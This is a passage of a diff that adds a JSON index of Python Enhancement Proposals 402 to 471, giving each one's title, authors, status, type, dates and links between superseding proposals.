Eby", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Jul-2011", + "python_version": "3.3", + "post_history": "20-Jul-2011", + "resolution": null, + "requires": null, + "replaces": "382", + "superseded_by": null, + "url": "https://peps.python.org/pep-0402/" + }, + "403": { + "number": 403, + "title": "General purpose decorator clause (aka \"@in\" clause)", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "13-Oct-2011", + "python_version": "3.4", + "post_history": "13-Oct-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0403/" + }, + "404": { + "number": 404, + "title": "Python 2.8 Un-release Schedule", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "09-Nov-2011", + "python_version": "2.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0404/" + }, + "405": { + "number": 405, + "title": "Python Virtual Environments", + "authors": "Carl Meyer", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "13-Jun-2011", + "python_version": "3.3", + "post_history": "24-Oct-2011, 28-Oct-2011, 06-Mar-2012, 24-May-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119668.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0405/" + }, + "406": { + "number": 406, + "title": "Improved Encapsulation of Import State", + "authors": "Alyssa Coghlan, Greg Slodkowicz", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Jul-2011", + "python_version": "3.4", + "post_history": "31-Jul-2011, 13-Nov-2011, 04-Dec-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0406/" + }, + "407": { + "number": 407, + "title": "New release cycle and introducing long-term support versions", + "authors": "Antoine Pitrou, Georg Brandl, Barry Warsaw", + "discussions_to": null, + "status": "Deferred", + "type": "Process", + "topic": "", + "created": "12-Jan-2012", + "python_version": null, + "post_history": "17-Jan-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0407/" + }, + "408": { + "number": 408, + "title": "Standard library __preview__ package", + "authors": "Alyssa Coghlan, Eli Bendersky", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "07-Jan-2012", + "python_version": "3.3", + "post_history": "27-Jan-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-January/115962.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0408/" + }, + "409": { + "number": 409, + "title": "Suppressing exception context", + "authors": "Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2012", + "python_version": "3.3", + "post_history": "30-Aug-2002, 01-Feb-2012, 03-Feb-2012", + "resolution": 
"https://mail.python.org/pipermail/python-dev/2012-February/116136.html", + "requires": null, + "replaces": null, + "superseded_by": "415", + "url": "https://peps.python.org/pep-0409/" + }, + "410": { + "number": 410, + "title": "Use decimal.Decimal type for timestamps", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116837.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0410/" + }, + "411": { + "number": 411, + "title": "Provisional packages in the Python standard library", + "authors": "Alyssa Coghlan, Eli Bendersky", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "10-Feb-2012", + "python_version": "3.3", + "post_history": "10-Feb-2012, 24-Mar-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0411/" + }, + "412": { + "number": 412, + "title": "Key-Sharing Dictionary", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Feb-2012", + "python_version": "3.3", + "post_history": "08-Feb-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0412/" + }, + "413": { + "number": 413, + "title": "Faster evolution of the Python Standard Library", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "24-Feb-2012", + "python_version": null, + "post_history": "24-Feb-2012, 25-Feb-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0413/" + }, + "414": { + "number": 414, + "title": "Explicit Unicode Literal for Python 3.3", + "authors": "Armin Ronacher, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2012", + "python_version": "3.3", + "post_history": "28-Feb-2012, 04-Mar-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116995.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0414/" + }, + "415": { + "number": 415, + "title": "Implement context suppression with exception attributes", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2012", + "python_version": "3.3", + "post_history": "26-Feb-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119467.html", + "requires": null, + "replaces": "409", + "superseded_by": null, + "url": "https://peps.python.org/pep-0415/" + }, + "416": { + "number": 416, + "title": "Add a frozendict builtin type", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0416/" + }, + "417": { + "number": 417, + "title": "Including mock in the Standard Library", + "authors": 
"Michael Foord", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Mar-2012", + "python_version": "3.3", + "post_history": "12-Mar-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-March/117507.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0417/" + }, + "418": { + "number": 418, + "title": "Add monotonic time, performance counter, and process time functions", + "authors": "Cameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Mar-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0418/" + }, + "419": { + "number": 419, + "title": "Protecting cleanup statements from interruptions", + "authors": "Paul Colomiets", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "06-Apr-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0419/" + }, + "420": { + "number": 420, + "title": "Implicit Namespace Packages", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Apr-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119651.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0420/" + }, + "421": { + "number": 421, + "title": "Adding sys.implementation", + "authors": "Eric Snow", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Apr-2012", + "python_version": "3.3", + "post_history": "26-Apr-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119683.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0421/" + }, + "422": { + "number": 422, + "title": "Simpler customisation of class creation", + "authors": "Alyssa Coghlan, Daniel Urban", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2012", + "python_version": "3.5", + "post_history": "05-Jun-2012, 10-Feb-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0422/" + }, + "423": { + "number": 423, + "title": "Naming conventions and recipes related to packaging", + "authors": "Benoit Bryon", + "discussions_to": "distutils-sig@python.org", + "status": "Deferred", + "type": "Informational", + "topic": "packaging", + "created": "24-May-2012", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0423/" + }, + "424": { + "number": 424, + "title": "A method for exposing a length hint", + "authors": "Alex Gaynor", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2012", + "python_version": "3.4", + "post_history": "`15-Jul-2012 `__", + "resolution": null, + "requires": null, + "replaces": null, + 
"superseded_by": null, + "url": "https://peps.python.org/pep-0424/" + }, + "425": { + "number": 425, + "title": "Compatibility Tags for Built Distributions", + "authors": "Daniel Holth", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Jul-2012", + "python_version": "3.4", + "post_history": "08-Aug-2012, 18-Oct-2012, 15-Feb-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-February/124116.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0425/" + }, + "426": { + "number": 426, + "title": "Metadata for Python Software Packages 2.0", + "authors": "Alyssa Coghlan, Daniel Holth, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Informational", + "topic": "packaging", + "created": "30-Aug-2012", + "python_version": null, + "post_history": "14-Nov-2012, 05-Feb-2013, 07-Feb-2013, 09-Feb-2013, 27-May-2013, 20-Jun-2013, 23-Jun-2013, 14-Jul-2013, 21-Dec-2013", + "resolution": null, + "requires": "440, 508, 518", + "replaces": "345", + "superseded_by": "566", + "url": "https://peps.python.org/pep-0426/" + }, + "427": { + "number": 427, + "title": "The Wheel Binary Package Format 1.0", + "authors": "Daniel Holth", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Sep-2012", + "python_version": null, + "post_history": "18-Oct-2012, 15-Feb-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-February/124103.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0427/" + }, + "428": { + "number": 428, + "title": "The pathlib module -- object-oriented filesystem paths", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2012", + "python_version": "3.4", + "post_history": "`05-Oct-2012 `__", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130424.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0428/" + }, + "429": { + "number": 429, + "title": "Python 3.4 Release Schedule", + "authors": "Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "17-Oct-2012", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0429/" + }, + "430": { + "number": 430, + "title": "Migrating to Python 3 as the default online documentation", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "27-Oct-2012", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0430/" + }, + "431": { + "number": 431, + "title": "Time zone support improvements", + "authors": "Lennart Regebro", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2012", + "python_version": null, + "post_history": "11-Dec-2012, 28-Dec-2012, 28-Jan-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "615", + "url": 
"https://peps.python.org/pep-0431/" + }, + "432": { + "number": 432, + "title": "Restructuring the CPython startup sequence", + "authors": "Alyssa Coghlan, Victor Stinner, Eric Snow", + "discussions_to": "capi-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "28-Dec-2012", + "python_version": null, + "post_history": "28-Dec-2012, 02-Jan-2013, 30-Mar-2019, 28-Jun-2020", + "resolution": null, + "requires": "587", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0432/" + }, + "433": { + "number": 433, + "title": "Easier suppression of file descriptor inheritance", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "10-Jan-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "446", + "url": "https://peps.python.org/pep-0433/" + }, + "434": { + "number": 434, + "title": "IDLE Enhancement Exception for All Branches", + "authors": "Todd Rovito, Terry Reedy", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "16-Feb-2013", + "python_version": null, + "post_history": "16-Feb-2013, 03-Mar-2013, 21-Mar-2013, 30-Mar-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-March/125003.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0434/" + }, + "435": { + "number": 435, + "title": "Adding an Enum type to the Python standard library", + "authors": "Barry Warsaw, Eli Bendersky, Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Feb-2013", + "python_version": "3.4", + "post_history": "23-Feb-2013, 02-May-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126112.html", + "requires": null, + "replaces": "354", + "superseded_by": null, + "url": "https://peps.python.org/pep-0435/" + }, + "436": { + "number": 436, + "title": "The Argument Clinic DSL", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0436/" + }, + "437": { + "number": 437, + "title": "A DSL for specifying signatures, annotations and argument converters", + "authors": "Stefan Krah", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126117.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0437/" + }, + "438": { + "number": 438, + "title": "Transitioning to release-file hosting on PyPI", + "authors": "Holger Krekel, Carl Meyer", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Process", + "topic": "packaging", + "created": "15-Mar-2013", + "python_version": null, + "post_history": "19-May-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-May/020773.html", + "requires": null, + "replaces": null, + "superseded_by": "470", + "url": "https://peps.python.org/pep-0438/" 
+ }, + "439": { + "number": 439, + "title": "Inclusion of implicit pip bootstrap in Python installation", + "authors": "Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2013", + "python_version": "3.4", + "post_history": "19-Mar-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-August/022527.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0439/" + }, + "440": { + "number": 440, + "title": "Version Identification and Dependency Specification", + "authors": "Alyssa Coghlan, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2013", + "python_version": null, + "post_history": "30-Mar-2013, 27-May-2013, 20-Jun-2013, 21-Dec-2013, 28-Jan-2014, 08-Aug-2014, 22-Aug-2014", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2014-August/024673.html", + "requires": null, + "replaces": "386", + "superseded_by": null, + "url": "https://peps.python.org/pep-0440/" + }, + "441": { + "number": 441, + "title": "Improving Python ZIP Application Support", + "authors": "Daniel Holth, Paul Moore", + "discussions_to": "https://mail.python.org/pipermail/python-dev/2015-February/138277.html", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2013", + "python_version": "3.5", + "post_history": "30-Mar-2013, 01-Apr-2013, 16-Feb-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138578.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0441/" + }, + "442": { + "number": 442, + "title": "Safe object finalization", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-May-2013", + "python_version": "3.4", + "post_history": "18-May-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-June/126746.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0442/" + }, + "443": { + "number": 443, + "title": "Single-dispatch generic functions", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-May-2013", + "python_version": "3.4", + "post_history": "22-May-2013, 25-May-2013, 31-May-2013", + "resolution": null, + "requires": null, + "replaces": "245, 246, 3124", + "superseded_by": null, + "url": "https://peps.python.org/pep-0443/" + }, + "444": { + "number": 444, + "title": "Python Web3 Interface", + "authors": "Chris McDonough, Armin Ronacher", + "discussions_to": "web-sig@python.org", + "status": "Deferred", + "type": "Informational", + "topic": "", + "created": "19-Jul-2010", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0444/" + }, + "445": { + "number": 445, + "title": "Add new APIs to customize Python memory allocators", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jun-2013", + "python_version": "3.4", + "post_history": null, + "resolution": 
"https://mail.python.org/pipermail/python-dev/2013-July/127222.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0445/" + }, + "446": { + "number": 446, + "title": "Make newly created file descriptors non-inheritable", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Aug-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "433", + "superseded_by": null, + "url": "https://peps.python.org/pep-0446/" + }, + "447": { + "number": 447, + "title": "Add __getdescriptor__ method to metaclass", + "authors": "Ronald Oussoren", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "12-Jun-2013", + "python_version": null, + "post_history": "02-Jul-2013, 15-Jul-2013, 29-Jul-2013, 22-Jul-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0447/" + }, + "448": { + "number": 448, + "title": "Additional Unpacking Generalizations", + "authors": "Joshua Landau", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jun-2013", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0448/" + }, + "449": { + "number": 449, + "title": "Removal of the PyPI Mirror Auto Discovery and Naming Scheme", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "04-Aug-2013", + "python_version": null, + "post_history": "04-Aug-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-August/022518.html", + "requires": null, + "replaces": "381", + "superseded_by": null, + "url": "https://peps.python.org/pep-0449/" + }, + "450": { + "number": 450, + "title": "Adding A Statistics Module To The Standard Library", + "authors": "Steven D'Aprano", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Aug-2013", + "python_version": "3.4", + "post_history": "13-Sep-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0450/" + }, + "451": { + "number": 451, + "title": "A ModuleSpec Type for the Import System", + "authors": "Eric Snow", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2013", + "python_version": "3.4", + "post_history": "08-Aug-2013, 28-Aug-2013, 18-Sep-2013, 24-Sep-2013, 04-Oct-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130104.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0451/" + }, + "452": { + "number": 452, + "title": "API for Cryptographic Hash Functions v2.0", + "authors": "A.M. 
Kuchling, Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "15-Aug-2013", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "247", + "superseded_by": null, + "url": "https://peps.python.org/pep-0452/" + }, + "453": { + "number": 453, + "title": "Explicit bootstrapping of pip in Python installations", + "authors": "Donald Stufft, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Aug-2013", + "python_version": null, + "post_history": "30-Aug-2013, 15-Sep-2013, 18-Sep-2013, 19-Sep-2013, 23-Sep-2013, 29-Sep-2013, 13-Oct-2013, 20-Oct-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-October/129810.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0453/" + }, + "454": { + "number": 454, + "title": "Add a new tracemalloc module to trace Python memory allocations", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130491.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0454/" + }, + "455": { + "number": 455, + "title": "Adding a key-transforming dictionary to collections", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2013", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0455/" + }, + "456": { + "number": 456, + "title": "Secure and interchangeable hash algorithm", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Sep-2013", + "python_version": "3.4", + "post_history": "06-Oct-2013, 14-Nov-2013, 20-Nov-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130400.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0456/" + }, + "457": { + "number": 457, + "title": "Notation For Positional-Only Parameters", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "08-Oct-2013", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0457/" + }, + "458": { + "number": 458, + "title": "Secure PyPI downloads with signed repository metadata", + "authors": "Trishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos", + "discussions_to": "https://discuss.python.org/t/pep-458-secure-pypi-downloads-with-package-signing/2648", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Sep-2013", + "python_version": null, + "post_history": "06-Jan-2019, 13-Nov-2019", + "resolution": "https://discuss.python.org/t/pep-458-secure-pypi-downloads-with-package-signing/2648/115", + "requires": null, + "replaces": null, + "superseded_by": null, + 
"url": "https://peps.python.org/pep-0458/" + }, + "459": { + "number": 459, + "title": "Standard Metadata Extensions for Python Software Packages", + "authors": "Alyssa Coghlan", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Nov-2013", + "python_version": null, + "post_history": "21-Dec-2013", + "resolution": null, + "requires": "426", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0459/" + }, + "460": { + "number": 460, + "title": "Add binary interpolation and formatting", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-Jan-2014", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0460/" + }, + "461": { + "number": 461, + "title": "Adding % formatting to bytes and bytearray", + "authors": "Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jan-2014", + "python_version": "3.5", + "post_history": "14-Jan-2014, 15-Jan-2014, 17-Jan-2014, 22-Feb-2014, 25-Mar-2014, 27-Mar-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-March/133621.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0461/" + }, + "462": { + "number": 462, + "title": "Core development workflow automation for CPython", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "23-Jan-2014", + "python_version": null, + "post_history": "25-Jan-2014, 27-Jan-2014, 01-Feb-2015", + "resolution": null, + "requires": "474", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0462/" + }, + "463": { + "number": 463, + "title": "Exception-catching expressions", + "authors": "Chris Angelico", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2014", + "python_version": "3.5", + "post_history": "20-Feb-2014, 16-Feb-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-March/133118.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0463/" + }, + "464": { + "number": 464, + "title": "Removal of the PyPI Mirror Authenticity API", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "02-Mar-2014", + "python_version": null, + "post_history": "04-Mar-2014", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2014-March/024027.html", + "requires": null, + "replaces": "381", + "superseded_by": null, + "url": "https://peps.python.org/pep-0464/" + }, + "465": { + "number": 465, + "title": "A dedicated infix operator for matrix multiplication", + "authors": "Nathaniel J. 
Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Feb-2014", + "python_version": "3.5", + "post_history": "13-Mar-2014", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/D63NDWHPF7OC2Z455MPHOW6QLLSNQUJ5/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0465/" + }, + "466": { + "number": 466, + "title": "Network Security Enhancements for Python 2.7.x", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Mar-2014", + "python_version": "2.7.9", + "post_history": "23-Mar-2014, 24-Mar-2014, 25-Mar-2014, 26-Mar-2014, 16-Apr-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-April/134163.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0466/" + }, + "467": { + "number": 467, + "title": "Minor API improvements for binary sequences", + "authors": "Alyssa Coghlan, Ethan Furman", + "discussions_to": "https://discuss.python.org/t/42001", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2014", + "python_version": "3.13", + "post_history": "30-Mar-2014, 15-Aug-2014, 16-Aug-2014, 07-Jun-2016, 01-Sep-2016, 13-Apr-2021, 03-Nov-2021, 27-Dec-2023", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0467/" + }, + "468": { + "number": 468, + "title": "Preserving the order of \\*\\*kwargs in a function.", + "authors": "Eric Snow", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Apr-2014", + "python_version": "3.6", + "post_history": "05-Apr-2014, 08-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146329.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0468/" + }, + "469": { + "number": 469, + "title": "Migration of dict iteration code to Python 3", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2014", + "python_version": "3.5", + "post_history": "18-Apr-2014, 21-Apr-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0469/" + }, + "470": { + "number": 470, + "title": "Removing External Hosting Support on PyPI", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "12-May-2014", + "python_version": null, + "post_history": "14-May-2014, 05-Jun-2014, 03-Oct-2014, 13-Oct-2014, 26-Aug-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-September/026789.html", + "requires": null, + "replaces": "438", + "superseded_by": null, + "url": "https://peps.python.org/pep-0470/" + }, + "471": { + "number": 471, + "title": "os.scandir() function -- a better and faster directory iterator", + "authors": "Ben Hoyt", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-May-2014", + "python_version": "3.5", + "post_history": "27-Jun-2014, 08-Jul-2014, 14-Jul-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": 
